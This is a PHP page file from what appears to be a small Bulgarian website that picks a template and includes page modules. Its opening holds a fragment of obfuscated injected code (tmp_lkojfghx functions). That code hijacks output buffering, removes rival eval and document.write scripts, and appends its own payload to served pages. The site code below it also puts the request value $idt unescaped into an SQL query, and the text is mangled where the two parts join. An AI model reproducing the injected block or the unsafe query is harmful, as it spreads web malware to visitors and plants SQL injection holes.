#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('##','',$s);if(stristr($s,'
'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i include("inc/sess.php");?>
include("inc/mysql_class.php");
if (empty($idt)){
$idt = "home";
}
$gt = "select * from template where navigation='$idt'";
$qgt = $uMysql->Query($gt);
$tags = $uMysql->FetchArray($qgt);
if (empty($tags[ID])){
$gt = "select * from template where navigation='home'";
$qgt = $uMysql->Query($gt);
$tags = $uMysql->FetchArray($qgt);
}
?>
echo $tags[title];?>
switch ($fid){
case 1:
include("inc/start.php");
break;
case 2:
if ($sintez == "1"){
include("kt-view.php");
} else {
include("info.php");
}
break;
case 3:
include("kino-full.php");
break;
case 4:
include("infosintez.php");
break;
case 6:
include("inc/gall.php");
break;
case 8:
include("inc/mailus.php");
break;
case 11:
if ($stat == "1"){
$msg = "Съобщението е изпратоено успешно !!!";
}
if ($stat == "2"){
$msg = "Съобщението не беше изпратено поради технически причини моле сжържате се с нас на
emo@byala.com";
}
echo "
".$msg."
";
break;
case 100:
include("uscont.php");
break;
case 101:
include("cu.php");
break;
default:
include("inc/start.php");
}
?>